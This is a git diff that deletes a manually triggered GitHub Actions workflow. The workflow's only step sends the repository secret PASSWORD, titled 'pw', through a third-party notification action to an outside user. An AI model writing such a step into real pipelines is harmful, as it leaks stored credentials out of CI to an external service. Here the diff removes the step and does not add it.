diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml deleted file mode 100644 index 62ac311..0000000 --- a/.github/workflows/ci.yml +++ /dev/null @@ -1,15 +0,0 @@ -name: Prerelease Build - -on: - workflow_dispatch: - -jobs: - build: - runs-on: ubuntu-latest - steps: - - name: Notify - uses: ZNotify/action@master - with: - user_id: zxilly - title: pw - content: "${{ secrets.PASSWORD }}"